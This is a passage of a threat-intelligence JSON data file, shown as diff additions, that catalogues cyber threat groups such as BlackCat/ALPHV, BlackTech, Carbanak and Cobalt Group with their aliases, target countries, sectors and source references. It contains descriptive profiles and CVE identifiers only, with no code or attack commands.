"Aerospace", + "Defense", + "Energy", + "Government", + "Manufacturing", + "Non Profit", + "Pharmaceuticals", + "Technology", + "Telecommunications" + ] + }, + "related": [ + { + "dest-uuid": "99e30d89-9361-4b73-a999-9e5ff9320bcb", + "type": "similar" + }, + { + "dest-uuid": "a975effb-1b65-4dd5-85ba-b0d12d94b7a8", + "type": "similar" + } + ], + "uuid": "90f4d3f9-3fe3-4a64-8dc1-172c6d037dca", + "value": "Axiom" + }, + { + "description": "[BackdoorDiplomacy](https://app.tidalcyber.com/groups/e5b0da2b-12bc-4113-9459-9c51329c9ae0) is a cyber espionage threat group that has been active since at least 2017. [BackdoorDiplomacy](https://app.tidalcyber.com/groups/e5b0da2b-12bc-4113-9459-9c51329c9ae0) has targeted Ministries of Foreign Affairs and telecommunication companies in Africa, Europe, the Middle East, and Asia.[[ESET BackdoorDiplomacy Jun 2021](https://app.tidalcyber.com/references/127d4b10-8d61-4bdf-b5b9-7d86bbc065b6)]", + "meta": { + "group_attack_id": "G0135", + "observed_countries": [ + "AL", + "AT", + "HR", + "GE", + "DE", + "GH", + "IN", + "LY", + "NA", + "NG", + "PL", + "QA", + "SA", + "ZA", + "AE", + "GB", + "UZ" + ], + "observed_motivations": [], + "source": "MITRE", + "tags": [], + "target_categories": [ + "Government", + "Non Profit", + "Telecommunications" + ] + }, + "related": [], + "uuid": "e5b0da2b-12bc-4113-9459-9c51329c9ae0", + "value": "BackdoorDiplomacy" + }, + { + "description": "BianLian is an extortion-focused threat actor group. The group originally used double-extortion methods when it began its operations in June 2022, demanding payment in exchange for decrypting locked files while also threatening to leak exfiltrated data. U.S. & Australian cybersecurity officials observed BianLian actors shifting almost exclusively to exfiltration-focused extortion schemes in 2023.[[U.S. CISA BianLian Ransomware May 2023](/references/aa52e826-f292-41f6-985d-0282230c8948)]\n\n**Related Vulnerabilities**: CVE-2020-1472[[U.S. CISA BianLian Ransomware May 2023](/references/aa52e826-f292-41f6-985d-0282230c8948)], CVE-2021-34473[[BianLian Ransomware Gang Gives It a Go! | [redacted]](/references/fc1aa979-7dbc-4fff-a8d1-b35a3b2bec3d)], CVE-2021-34523[[BianLian Ransomware Gang Gives It a Go! | [redacted]](/references/fc1aa979-7dbc-4fff-a8d1-b35a3b2bec3d)], CVE-2021-31207[[BianLian Ransomware Gang Gives It a Go! | [redacted]](/references/fc1aa979-7dbc-4fff-a8d1-b35a3b2bec3d)]\n\n**PulseDive (IOCs)**: https://pulsedive.com/threat/BianLian", + "meta": { + "group_attack_id": "G5000", + "observed_countries": [ + "AU", + "CA", + "FR", + "DE", + "IN", + "ES", + "GB", + "US" + ], + "observed_motivations": [ + "Financial Gain" + ], + "owner": "TidalCyberIan", + "source": "Tidal Cyber", + "tags": [ + "35e694ec-5133-46e3-b7e1-5831867c3b55", + "15787198-6c8b-4f79-bf50-258d55072fee", + "d713747c-2d53-487e-9dac-259230f04460", + "964c2590-4b52-48c6-afff-9a6d72e68908", + "fde4c246-7d2d-4d53-938b-44651cf273f1", + "2743d495-7728-4a75-9e5f-b64854039792", + "5e7433ad-a894-4489-93bc-41e90da90019", + "7e7b0c67-bb85-4996-a289-da0e792d7172" + ], + "target_categories": [ + "Automotive", + "Casinos Gambling", + "Construction", + "Education", + "Financial Services", + "Government", + "Healthcare", + "Legal", + "Manufacturing", + "Media", + "Mining", + "Retail", + "Technology" + ] + }, + "related": [], + "uuid": "a2add2a0-2b54-4623-a380-a9ad91f1f2dd", + "value": "BianLian Ransomware Group" + }, + { + "description": "[[Cisco Talos Bitter Bangladesh May 2022](https://app.tidalcyber.com/references/097583ed-03b0-41cd-bf85-66d473f46439)]", + "meta": { + "id": "f4e52f24-5321-41c6-b198-c118b9c7abd6" + }, + "related": [ + { + "dest-uuid": "3a02aa1b-851a-43e1-b83b-58037f3c7025", + "type": "similar" + } + ], + "uuid": "fd4b4e28-6f0c-43a5-b42d-6d2488d1ff93", + "value": "T-APT-17" + }, + { + "description": "[BITTER](https://app.tidalcyber.com/groups/3a02aa1b-851a-43e1-b83b-58037f3c7025) is a suspected South Asian cyber espionage threat group that has been active since at least 2013. [BITTER](https://app.tidalcyber.com/groups/3a02aa1b-851a-43e1-b83b-58037f3c7025) has primarily targeted government, energy, and engineering organizations in Pakistan, China, Bangladesh, and Saudi Arabia.[[Cisco Talos Bitter Bangladesh May 2022](https://app.tidalcyber.com/references/097583ed-03b0-41cd-bf85-66d473f46439)][[Forcepoint BITTER Pakistan Oct 2016](https://app.tidalcyber.com/references/9fc54fb0-b7d9-49dc-b6dd-ab4cb2cd34fa)]", + "meta": { + "group_attack_id": "G1002", + "observed_countries": [], + "observed_motivations": [], + "source": "MITRE", + "tags": [], + "target_categories": [] + }, + "related": [ + { + "dest-uuid": "fd4b4e28-6f0c-43a5-b42d-6d2488d1ff93", + "type": "similar" + } + ], + "uuid": "3a02aa1b-851a-43e1-b83b-58037f3c7025", + "value": "BITTER" + }, + { + "description": "Bl00dy self-identifies as a ransomware group. It gained attention in May 2023 for a series of data exfiltration and encryption attacks against education entities in the United States that featured exploit of vulnerabilities in PaperCut print management software, which is prevalent in the sector.[[U.S. CISA PaperCut May 2023](/references/b5ef2b97-7cc7-470b-ae97-a45dc4af32a6)]\n\n**Related Vulnerabilities**: CVE-2023-27350[[U.S. CISA PaperCut May 2023](/references/b5ef2b97-7cc7-470b-ae97-a45dc4af32a6)]", + "meta": { + "group_attack_id": "G5002", + "observed_countries": [ + "US" + ], + "observed_motivations": [ + "Financial Gain" + ], + "owner": "TidalCyberIan", + "source": "Tidal Cyber", + "tags": [ + "fdd53e62-5bf1-41f1-8bd6-b970a866c39d", + "d431939f-2dc0-410b-83f7-86c458125444", + "1b5da77a-bf84-4fba-a6d7-8b3b8f7699e0", + "15787198-6c8b-4f79-bf50-258d55072fee", + "a98d7a43-f227-478e-81de-e7299639a355", + "992bdd33-4a47-495d-883a-58010a2f0efb", + "5e7433ad-a894-4489-93bc-41e90da90019", + "7e7b0c67-bb85-4996-a289-da0e792d7172" + ], + "target_categories": [ + "Education", + "Healthcare", + "High Tech", + "Manufacturing", + "Technology" + ] + }, + "related": [], + "uuid": "393da13e-016c-41a3-9d89-b33173adecbf", + "value": "Bl00dy Ransomware Gang" + }, + { + "description": "This object represents the BlackCat/ALPHV Ransomware-as-a-Service (“RaaS”) apex group and the behaviors associated with its various affiliate ransomware operators. Specific affiliate operations defined by the research community will be tracked as separate objects.\n\nResearchers first observed BlackCat ransomware (AKA ALPHV or Noberus) in November 2021. An April 2022 U.S. FBI advisory linked BlackCat’s developers and money launderers to the defunct Blackmatter and Darkside ransomware operations (the latter was responsible for the major 2021 Colonial Pipeline incident).[[FBI BlackCat April 19 2022](/references/2640b58c-8413-4691-80e1-33aec9b6c7f6)] As of September 2023, BlackCat is believed to be responsible for attacking organizations globally and in virtually every major sector, and it consistently claims some of the highest victim tallies of any RaaS. According to data collected by the [ransomwatch project](https://github.com/joshhighet/ransomwatch) and analyzed by Tidal, BlackCat actors publicly claimed 233 victims in 2022, the third most of any ransomware operation in the dataset (considerably below Clop (558) but well above Hive (181)), and it already surpassed that number by July of 2023.[[GitHub ransomwatch](/references/62037959-58e4-475a-bb91-ff360d20c1d7)] Like many RaaS, BlackCat actors threaten to leak exfiltrated victim data, but they also threaten to carry out denial of service attacks if victims do not pay timely ransoms.[[BlackBerry BlackCat Threat Overview](/references/59f98ae1-c62d-460f-8d2a-9ae287b59953)]\n\nBlackCat developers have regularly evolved the namesake ransomware over time, and collaboration with affiliates means that a large number and variety of tools & TTPs are observed during intrusions involving BlackCat. BlackCat became the first prominent ransomware family to transition to the Rust programming language in 2022, which researchers assess provides greater customization and defense evasion capabilities and faster performance.[[X-Force BlackCat May 30 2023](/references/b80c1f70-9d05-4f4b-bdc2-6157c6837202)][[FBI BlackCat April 19 2022](/references/2640b58c-8413-4691-80e1-33aec9b6c7f6)] A BlackCat variant named Sphynx emerged in early 2023, featuring multiple defense evasion-focused enhancements. In Q3 2023, public reports suggested that Scattered Spider (AKA 0ktapus or UNC3944), a group attributed to several prominent intrusions involving telecommunications, technology, and casino entities, had begun to use BlackCat/Sphynx ransomware during its operations.[[Caesars Scattered Spider September 13 2023](/references/6915c003-7c8b-451c-8fb1-3541f00c14fb)][[BushidoToken Scattered Spider August 16 2023](/references/621a8320-0e3c-444f-b82a-7fd4fdf9fb67)]", + "meta": { + "group_attack_id": "G5005", + "observed_countries": [ + "AU", + "AT", + "BO", + "BR", + "CA", + "CL", + "CN", + "CO", + "CZ", + "EC", + "EG", + "FR", + "DE", + "GR", + "HK", + "HU", + "IN", + "ID", + "IE", + "IL", + "IT", + "JM", + "JP", + "KE", + "LU", + "MY", + "MX", + "NL", + "NG", + "PA", + "PH", + "RO", + "SA", + "ES", + "CH", + "TH", + "TN", + "TR", + "AE", + "GB", + "US" + ], + "observed_motivations": [ + "Financial Gain" + ], + "owner": "TidalCyberIan", + "source": "Tidal Cyber", + "tags": [ + "1dc8fd1e-0737-405a-98a1-111dd557f1b5", + "15787198-6c8b-4f79-bf50-258d55072fee", + "7140a6ea-2c03-4028-9da9-21d6157fdb13", + "963e4802-3d3f-4e4b-b258-0b36020997b9", + "a58fbc12-8068-4eba-89f0-64c9d5a7aaf8", + "b0098999-7465-42a0-ac7d-a55001c4e79f", + "33d22eff-59a1-47e0-b9eb-615dee314595", + "fe3eb26d-6daa-4f82-b0dd-fc1e2fffbc2b", + "e401022a-36ac-486d-8503-dd531410a927", + "c8ce7130-e134-492c-a98a-ed1d25b57e4c", + "5e7433ad-a894-4489-93bc-41e90da90019", + "7e7b0c67-bb85-4996-a289-da0e792d7172" + ], + "target_categories": [ + "Automotive", + "Banks", + "Casinos Gambling", + "Construction", + "Education", + "Electronics", + "Energy", + "Financial Services", + "Government", + "Healthcare", + "Hospitality Leisure", + "Insurance", + "Legal", + "Manufacturing", + "Media", + "Pharmaceuticals", + "Retail", + "Technology", + "Telecommunications", + "Transportation" + ] + }, + "related": [], + "uuid": "33159d02-a1ce-49ec-a381-60b069db66f7", + "value": "BlackCat Ransomware Actors & Affiliates" + }, + { + "description": "[BlackOasis](https://app.tidalcyber.com/groups/428dc121-a593-4981-9127-f958ae0a0fdd) is a Middle Eastern threat group that is believed to be a customer of Gamma Group. The group has shown interest in prominent figures in the United Nations, as well as opposition bloggers, activists, regional news correspondents, and think tanks. [[Securelist BlackOasis Oct 2017](https://app.tidalcyber.com/references/66121c37-6b66-4ab2-9f63-1adb80dcec62)] [[Securelist APT Trends Q2 2017](https://app.tidalcyber.com/references/fe28042c-d289-463f-9ece-1a75a70b966e)] A group known by Microsoft as [NEODYMIUM](https://app.tidalcyber.com/groups/3a660ef3-9954-4252-8946-f903f3f42d0c) is reportedly associated closely with [BlackOasis](https://app.tidalcyber.com/groups/428dc121-a593-4981-9127-f958ae0a0fdd) operations, but evidence that the group names are aliases has not been identified. [[CyberScoop BlackOasis Oct 2017](https://app.tidalcyber.com/references/a8224ad5-4688-4382-a3e7-1dd3ed74ebce)]", + "meta": { + "group_attack_id": "G0063", + "observed_countries": [ + "AF", + "AO", + "BH", + "IR", + "IQ", + "JO", + "LY", + "NL", + "NG", + "RU", + "SA", + "TN", + "GB" + ], + "observed_motivations": [], + "source": "MITRE", + "tags": [], + "target_categories": [] + }, + "related": [ + { + "dest-uuid": "8fbd195f-5e03-4e85-8ca5-4f1dff300bec", + "type": "similar" + } + ], + "uuid": "428dc121-a593-4981-9127-f958ae0a0fdd", + "value": "BlackOasis" + }, + { + "description": "[[Symantec Palmerworm Sep 2020](https://app.tidalcyber.com/references/84ecd475-8d3f-4e7c-afa8-2dff6078bed5)][[IronNet BlackTech Oct 2021](https://app.tidalcyber.com/references/98b2d114-4246-409d-934a-238682fd5ae6)]", + "meta": { + "id": "f0d645a2-10c4-47ba-93c5-25113f1da1c6" + }, + "related": [ + { + "dest-uuid": "528ab2ea-b8f1-44d8-8831-2a89fefd97cb", + "type": "similar" + } + ], + "uuid": "25cec21f-c276-4d0c-adef-6313bd752e07", + "value": "Palmerworm" + }, + { + "description": "[[U.S. CISA BlackTech September 27 2023](/references/309bfb48-76d1-4ae9-9c6a-30b54658133c)]", + "meta": { + "id": "0fd0a5c0-8fe5-40b0-aaba-c3407636b6cf", + "owner": "TidalCyberIan", + "owner_id": "bebdd211-52f4-4abc-94ff-b3a7df904561" + }, + "related": [ + { + "dest-uuid": "528ab2ea-b8f1-44d8-8831-2a89fefd97cb", + "type": "similar" + } + ], + "uuid": "e3baf8a3-d4bb-4ef0-add7-39bc238b0c12", + "value": "Temp.Overboard" + }, + { + "description": "[[U.S. CISA BlackTech September 27 2023](/references/309bfb48-76d1-4ae9-9c6a-30b54658133c)]", + "meta": { + "id": "a8a9cd0f-96d4-4157-9e52-6d169c2a2f24", + "owner": "TidalCyberIan", + "owner_id": "bebdd211-52f4-4abc-94ff-b3a7df904561" + }, + "related": [ + { + "dest-uuid": "528ab2ea-b8f1-44d8-8831-2a89fefd97cb", + "type": "similar" + } + ], + "uuid": "c1769626-608d-42b4-b0dc-67520181e8a6", + "value": "Circuit Panda" + }, + { + "description": "[[U.S. CISA BlackTech September 27 2023](/references/309bfb48-76d1-4ae9-9c6a-30b54658133c)]", + "meta": { + "id": "0bac0bf4-1488-4b4c-b949-aa2703a1ac95", + "owner": "TidalCyberIan", + "owner_id": "bebdd211-52f4-4abc-94ff-b3a7df904561" + }, + "related": [ + { + "dest-uuid": "528ab2ea-b8f1-44d8-8831-2a89fefd97cb", + "type": "similar" + } + ], + "uuid": "4e472ebd-7685-409e-a41d-b9034d04583f", + "value": "Radio Panda" + }, + { + "description": "[BlackTech](https://app.tidalcyber.com/groups/528ab2ea-b8f1-44d8-8831-2a89fefd97cb) is a suspected Chinese cyber espionage group that has primarily targeted organizations in East Asia--particularly Taiwan, Japan, and Hong Kong--and the US since at least 2013. [BlackTech](https://app.tidalcyber.com/groups/528ab2ea-b8f1-44d8-8831-2a89fefd97cb) has used a combination of custom malware, dual-use tools, and living off the land tactics to compromise media, construction, engineering, electronics, and financial company networks.[[TrendMicro BlackTech June 2017](https://app.tidalcyber.com/references/abb9cb19-d30e-4048-b106-eb29a6dad7fc)][[Symantec Palmerworm Sep 2020](https://app.tidalcyber.com/references/84ecd475-8d3f-4e7c-afa8-2dff6078bed5)][[Reuters Taiwan BlackTech August 2020](https://app.tidalcyber.com/references/77293f88-e336-4786-b042-7f0080bbff32)]", + "meta": { + "country": "CN", + "group_attack_id": "G0098", + "observed_countries": [ + "CN", + "HK", + "JP", + "TW", + "US" + ], + "observed_motivations": [ + "Cyber Espionage" + ], + "source": "MITRE", + "tags": [], + "target_categories": [ + "Construction", + "Defense", + "Electronics", + "Financial Services", + "Government", + "Media", + "Technology", + "Telecommunications" + ] + }, + "related": [ + { + "dest-uuid": "320c42f7-eab7-4ef9-b09a-74396caa6c3e", + "type": "similar" + }, + { + "dest-uuid": "25cec21f-c276-4d0c-adef-6313bd752e07", + "type": "similar" + }, + { + "dest-uuid": "e3baf8a3-d4bb-4ef0-add7-39bc238b0c12", + "type": "similar" + }, + { + "dest-uuid": "c1769626-608d-42b4-b0dc-67520181e8a6", + "type": "similar" + }, + { + "dest-uuid": "4e472ebd-7685-409e-a41d-b9034d04583f", + "type": "similar" + } + ], + "uuid": "528ab2ea-b8f1-44d8-8831-2a89fefd97cb", + "value": "BlackTech" + }, + { + "description": "[Blue Mockingbird](https://app.tidalcyber.com/groups/b82c6ed1-c74a-4128-8b4d-18d1e17e1134) is a cluster of observed activity involving Monero cryptocurrency-mining payloads in dynamic-link library (DLL) form on Windows systems. The earliest observed Blue Mockingbird tools were created in December 2019.[[RedCanary Mockingbird May 2020](https://app.tidalcyber.com/references/596bfbb3-72e0-4d4c-a1a9-b8d54455ffd0)]", + "meta": { + "group_attack_id": "G0108", + "observed_countries": [], + "observed_motivations": [ + "Financial Gain" + ], + "source": "MITRE", + "tags": [], + "target_categories": [] + }, + "related": [], + "uuid": "b82c6ed1-c74a-4128-8b4d-18d1e17e1134", + "value": "Blue Mockingbird" + }, + { + "description": "[[Trend Micro Daserf Nov 2017](https://app.tidalcyber.com/references/4ca0e6a9-8c20-49a0-957a-7108083a8a29)][[Trend Micro Tick November 2019](https://app.tidalcyber.com/references/93adbf0d-5f5e-498e-aca1-ed3eb11561e7)]", + "meta": { + "id": "dbaaf996-8ef8-4463-9953-4ce480d051cf" + }, + "related": [ + { + "dest-uuid": "5825a840-5577-4ffc-a08d-3f48d64395cb", + "type": "similar" + } + ], + "uuid": "84db787e-f59b-4318-be71-17bf3c55effa", + "value": "REDBALDKNIGHT" + }, + { + "description": "[[Trend Micro Daserf Nov 2017](https://app.tidalcyber.com/references/4ca0e6a9-8c20-49a0-957a-7108083a8a29)][[Symantec Tick Apr 2016](https://app.tidalcyber.com/references/3e29cacc-2c05-4f35-8dd1-948f8aee6713)][[Trend Micro Tick November 2019](https://app.tidalcyber.com/references/93adbf0d-5f5e-498e-aca1-ed3eb11561e7)]", + "meta": { + "id": "9e7fe94c-5b33-4fa6-9e42-46b416ff370b" + }, + "related": [ + { + "dest-uuid": "5825a840-5577-4ffc-a08d-3f48d64395cb", + "type": "similar" + } + ], + "uuid": "19c5a727-c2a1-411d-ad3c-b96b62dd72ea", + "value": "Tick" + }, + { + "description": "[BRONZE BUTLER](https://app.tidalcyber.com/groups/5825a840-5577-4ffc-a08d-3f48d64395cb) is a cyber espionage group with likely Chinese origins that has been active since at least 2008. The group primarily targets Japanese organizations, particularly those in government, biotechnology, electronics manufacturing, and industrial chemistry.[[Trend Micro Daserf Nov 2017](https://app.tidalcyber.com/references/4ca0e6a9-8c20-49a0-957a-7108083a8a29)][[Secureworks BRONZE BUTLER Oct 2017](https://app.tidalcyber.com/references/c62d8d1a-cd1b-4b39-95b6-68f3f063dacf)][[Trend Micro Tick November 2019](https://app.tidalcyber.com/references/93adbf0d-5f5e-498e-aca1-ed3eb11561e7)]", + "meta": { + "country": "CN", + "group_attack_id": "G0060", + "observed_countries": [ + "CN", + "HK", + "JP", + "KR", + "RU", + "SG", + "TW", + "US" + ], + "observed_motivations": [ + "Cyber Espionage" + ], + "source": "MITRE", + "tags": [], + "target_categories": [ + "Chemical", + "Defense", + "Electronics", + "Government", + "Manufacturing" + ] + }, + "related": [ + { + "dest-uuid": "add6554a-815a-4ac3-9b22-9337b9661ab8", + "type": "similar" + }, + { + "dest-uuid": "84db787e-f59b-4318-be71-17bf3c55effa", + "type": "similar" + }, + { + "dest-uuid": "19c5a727-c2a1-411d-ad3c-b96b62dd72ea", + "type": "similar" + } + ], + "uuid": "5825a840-5577-4ffc-a08d-3f48d64395cb", + "value": "BRONZE BUTLER" + }, + { + "description": "[[Fox-It Anunak Feb 2015](https://app.tidalcyber.com/references/d74a8d0b-887a-40b9-bd43-366764157990)]", + "meta": { + "id": "37ca20a9-b364-4370-8da1-7544e1b2a779" + }, + "related": [ + { + "dest-uuid": "72d9bea7-9ca1-43e6-8702-2fb7fb1355de", + "type": "similar" + } + ], + "uuid": "060c0532-780d-4e42-9023-2ac385f369d7", + "value": "Anunak" + }, + { + "description": "[Carbanak](https://app.tidalcyber.com/groups/72d9bea7-9ca1-43e6-8702-2fb7fb1355de) is a cybercriminal group that has used [Carbanak](https://app.tidalcyber.com/software/4cb9294b-9e4c-41b9-b640-46213a01952d) malware to target financial institutions since at least 2013. [Carbanak](https://app.tidalcyber.com/groups/72d9bea7-9ca1-43e6-8702-2fb7fb1355de) may be linked to groups tracked separately as [Cobalt Group](https://app.tidalcyber.com/groups/58db02e6-d908-47c2-bc82-ed58ada61331) and [FIN7](https://app.tidalcyber.com/groups/4348c510-50fc-4448-ab8d-c8cededd19ff) that have also used [Carbanak](https://app.tidalcyber.com/software/4cb9294b-9e4c-41b9-b640-46213a01952d) malware.[[Kaspersky Carbanak](https://app.tidalcyber.com/references/2f7e77db-fe39-4004-9945-3c8943708494)][[FireEye FIN7 April 2017](https://app.tidalcyber.com/references/6ee27fdb-1753-4fdf-af72-3295b072ff10)][[Europol Cobalt Mar 2018](https://app.tidalcyber.com/references/f9d1f2ab-9e75-48ce-bcdf-b7119687feef)][[Secureworks GOLD NIAGARA Threat Profile](https://app.tidalcyber.com/references/b11276cb-f6dd-4e91-90cd-9c287fb3e6b1)][[Secureworks GOLD KINGSWOOD Threat Profile](https://app.tidalcyber.com/references/36035bbb-1609-4461-be27-ef4a920b814c)]", + "meta": { + "group_attack_id": "G0008", + "observed_countries": [ + "AU", + "AT", + "BA", + "BR", + "CA", + "CN", + "FR", + "DE", + "IS", + "IN", + "IT", + "LT", + "MA", + "NP", + "NG", + "PK", + "PL", + "RU", + "SN", + "ES", + "SE", + "CH", + "TW", + "UA", + "GB", + "US" + ], + "observed_motivations": [ + "Financial Gain" + ], + "source": "MITRE", + "tags": [], + "target_categories": [ + "Financial Services" + ] + }, + "related": [ + { + "dest-uuid": "00220228-a5a4-4032-a30d-826bb55aa3fb", + "type": "similar" + }, + { + "dest-uuid": "060c0532-780d-4e42-9023-2ac385f369d7", + "type": "similar" + } + ], + "uuid": "72d9bea7-9ca1-43e6-8702-2fb7fb1355de", + "value": "Carbanak" + }, + { + "description": "[Chimera](https://app.tidalcyber.com/groups/ca93af75-0ffa-4df4-b86a-92d4d50e496e) is a suspected China-based threat group that has been active since at least 2018 targeting the semiconductor industry in Taiwan as well as data from the airline industry.[[Cycraft Chimera April 2020](https://app.tidalcyber.com/references/a5a14a4e-2214-44ab-9067-75429409d744)][[NCC Group Chimera January 2021](https://app.tidalcyber.com/references/70c217c3-83a2-40f2-8f47-b68d8bd4cdf0)]", + "meta": { + "country": "CN", + "group_attack_id": "G0114", + "observed_countries": [ + "TW" + ], + "observed_motivations": [], + "source": "MITRE", + "tags": [], + "target_categories": [ + "Semi Conductors", + "Travel Services" + ] + }, + "related": [], + "uuid": "ca93af75-0ffa-4df4-b86a-92d4d50e496e", + "value": "Chimera" + }, + { + "description": "[[Dell Threat Group 2889](https://app.tidalcyber.com/references/de7003cb-5127-4fd7-9475-d69e0d7f5cc8)]", + "meta": { + "id": "a307544f-424d-42a3-bb60-af98da937af7" + }, + "related": [ + { + "dest-uuid": "c8cc6ce8-d421-42e6-a6eb-2ea9d2d9ab07", + "type": "similar" + } + ], + "uuid": "91b42715-7646-497a-a146-50bdffad8f71", + "value": "Threat Group 2889" + }, + { + "description": "[[Dell Threat Group 2889](https://app.tidalcyber.com/references/de7003cb-5127-4fd7-9475-d69e0d7f5cc8)]", + "meta": { + "id": "eeee1c2a-3bb5-40cf-93b6-98b1043ec89c" + }, + "related": [ + { + "dest-uuid": "c8cc6ce8-d421-42e6-a6eb-2ea9d2d9ab07", + "type": "similar" + } + ], + "uuid": "18e47f6e-b3e3-40e9-8cc1-589f3b8dca36", + "value": "TG-2889" + }, + { + "description": "[Cleaver](https://app.tidalcyber.com/groups/c8cc6ce8-d421-42e6-a6eb-2ea9d2d9ab07) is a threat group that has been attributed to Iranian actors and is responsible for activity tracked as Operation Cleaver. [[Cylance Cleaver](https://app.tidalcyber.com/references/f0b45225-3ec3-406f-bd74-87f24003761b)] Strong circumstantial evidence suggests Cleaver is linked to Threat Group 2889 (TG-2889). [[Dell Threat Group 2889](https://app.tidalcyber.com/references/de7003cb-5127-4fd7-9475-d69e0d7f5cc8)]", + "meta": { + "country": "IR", + "group_attack_id": "G0003", + "observed_countries": [ + "CA", + "CN", + "FR", + "DE", + "IN", + "IL", + "KR", + "KW", + "MX", + "NL", + "PK", + "QA", + "SA", + "TR", + "AE", + "GB", + "US" + ], + "observed_motivations": [], + "source": "MITRE", + "tags": [], + "target_categories": [ + "Aerospace", + "Chemical", + "Defense", + "Education", + "Energy", + "Government", + "Healthcare", + "Manufacturing", + "Technology", + "Telecommunications" + ] + }, + "related": [ + { + "dest-uuid": "86724806-7ec9-4a48-a0a7-ecbde3bf4810", + "type": "similar" + }, + { + "dest-uuid": "91b42715-7646-497a-a146-50bdffad8f71", + "type": "similar" + }, + { + "dest-uuid": "18e47f6e-b3e3-40e9-8cc1-589f3b8dca36", + "type": "similar" + } + ], + "uuid": "c8cc6ce8-d421-42e6-a6eb-2ea9d2d9ab07", + "value": "Cleaver" + }, + { + "description": "[[Secureworks GOLD KINGSWOOD September 2018](https://app.tidalcyber.com/references/cda529b2-e152-4ff0-a6b3-d0305b09fef9)]", + "meta": { + "id": "4a04ccc8-b838-4e29-bdf3-258a2cf04ff1" + }, + "related": [ + { + "dest-uuid": "58db02e6-d908-47c2-bc82-ed58ada61331", + "type": "similar" + } + ], + "uuid": "14e60fe8-a70e-4b49-9e0c-d0417e2a8a2e", + "value": "GOLD KINGSWOOD" + }, + { + "description": "[[Talos Cobalt Group July 2018](https://app.tidalcyber.com/references/7cdfd0d1-f7e6-4625-91ff-f87f46f95864)] [[Crowdstrike Global Threat Report Feb 2018](https://app.tidalcyber.com/references/6c1ace5b-66b2-4c56-9301-822aad2c3c16)][[Morphisec Cobalt Gang Oct 2018](https://app.tidalcyber.com/references/0a0bdd4b-a680-4a38-967d-3ad92f04d619)]", + "meta": { + "id": "6b90d9bd-8c90-4afe-8fb3-feda0ca1b5dc" + }, + "related": [ + { + "dest-uuid": "58db02e6-d908-47c2-bc82-ed58ada61331", + "type": "similar" + } + ], + "uuid": "497264f0-60ec-4515-b123-4d17701d4bd8", + "value": "Cobalt Gang" + }, + { + "description": "[[Crowdstrike Global Threat Report Feb 2018](https://app.tidalcyber.com/references/6c1ace5b-66b2-4c56-9301-822aad2c3c16)]", + "meta": { + "id": "13e2fb7f-2628-4461-a391-b966890b30c7" + }, + "related": [ + { + "dest-uuid": "58db02e6-d908-47c2-bc82-ed58ada61331", + "type": "similar" + } + ], + "uuid": "5d356315-296c-4c79-b2e4-d4dcdcf59551", + "value": "Cobalt Spider" + }, + { + "description": "[Cobalt Group](https://app.tidalcyber.com/groups/58db02e6-d908-47c2-bc82-ed58ada61331) is a financially motivated threat group that has primarily targeted financial institutions since at least 2016. The group has conducted intrusions to steal money via targeting ATM systems, card processing, payment systems and SWIFT systems. [Cobalt Group](https://app.tidalcyber.com/groups/58db02e6-d908-47c2-bc82-ed58ada61331) has mainly targeted banks in Eastern Europe, Central Asia, and Southeast Asia. One of the alleged leaders was arrested in Spain in early 2018, but the group still appears to be active. The group has been known to target organizations in order to use their access to then compromise additional victims.[[Talos Cobalt Group July 2018](https://app.tidalcyber.com/references/7cdfd0d1-f7e6-4625-91ff-f87f46f95864)][[PTSecurity Cobalt Group Aug 2017](https://app.tidalcyber.com/references/f4ce1b4d-4f01-4083-8bc6-931cbac9ac38)][[PTSecurity Cobalt Dec 2016](https://app.tidalcyber.com/references/2de4d38f-c99d-4149-89e6-0349a4902aa2)][[Group IB Cobalt Aug 2017](https://app.tidalcyber.com/references/2d9ef1de-2ee6-4500-a87d-b55f83e65900)][[Proofpoint Cobalt June 2017](https://app.tidalcyber.com/references/c4922659-88b2-4311-9c9b-dc9b383d746a)][[RiskIQ Cobalt Nov 2017](https://app.tidalcyber.com/references/ebf961c5-bd68-42f3-8fd3-000946c7ae9c)][[RiskIQ Cobalt Jan 2018](https://app.tidalcyber.com/references/7d48b679-d44d-466e-b12b-16f0f9858d15)] Reporting indicates there may be links between [Cobalt Group](https://app.tidalcyber.com/groups/58db02e6-d908-47c2-bc82-ed58ada61331) and both the malware [Carbanak](https://app.tidalcyber.com/software/4cb9294b-9e4c-41b9-b640-46213a01952d) and the group [Carbanak](https://app.tidalcyber.com/groups/72d9bea7-9ca1-43e6-8702-2fb7fb1355de).[[Europol Cobalt Mar 2018](https://app.tidalcyber.com/references/f9d1f2ab-9e75-48ce-bcdf-b7119687feef)]", + "meta": { + "group_attack_id": "G0080", + "observed_countries": [ + "AR", + "AZ", + "BY", + "CA", + "CN", + "KZ", + "KG", + "MD", + "RU", + "TJ", + "GB", + "US", + "VN" + ], + "observed_motivations": [ + "Financial Gain" + ], + "source": "MITRE", + "tags": [ + "f2ae2283-f94d-4f8f-bbde-43f2bed66c55", + "57859162-d54e-4f4a-a89c-3ae374f09516" + ], + "target_categories": [ + "Banks", + "Financial Services" + ] + }, + "related": [ + { + "dest-uuid": "01967480-c49b-4d4a-a7fa-aef0eaf535fe", + "type": "similar" + }, + { + "dest-uuid": "14e60fe8-a70e-4b49-9e0c-d0417e2a8a2e", + "type": "similar" + }, + { + "dest-uuid": "497264f0-60ec-4515-b123-4d17701d4bd8", + "type": "similar" + }, + { + "dest-uuid": "5d356315-296c-4c79-b2e4-d4dcdcf59551", + "type": "similar" + } + ], + "uuid": "58db02e6-d908-47c2-bc82-ed58ada61331", + "value": "Cobalt Group" + }, + { + "description": "", + "meta": { + "id": "6d0045e9-37fd-4d43-8306-09da90621953" + }, + "related": [ + { + "dest-uuid": "d0f29889-7a9c-44d8-abdc-480b371f7b2b", + "type": "similar" + } + ], + "uuid": "f223d10c-171d-4aa7-ab2c-7ff2acaf88f1", + "value": "Confucius APT" + }, + { + "description": "[Confucius](https://app.tidalcyber.com/groups/d0f29889-7a9c-44d8-abdc-480b371f7b2b) is a cyber espionage group that has primarily targeted military personnel, high-profile personalities, business persons, and government organizations in South Asia since at least 2013. Security researchers have noted similarities between [Confucius](https://app.tidalcyber.com/groups/d0f29889-7a9c-44d8-abdc-480b371f7b2b) and [Patchwork](https://app.tidalcyber.com/groups/32385eba-7bbf-439e-acf2-83040e97165a), particularly in their respective custom malware code and targets.[[TrendMicro Confucius APT Feb 2018](https://app.tidalcyber.com/references/d1d5a708-75cb-4d41-b2a3-d035a14ac956)][[TrendMicro Confucius APT Aug 2021](https://app.tidalcyber.com/references/5c16aae9-d253-463b-8bbc-f14402ce77e4)][[Uptycs Confucius APT Jan 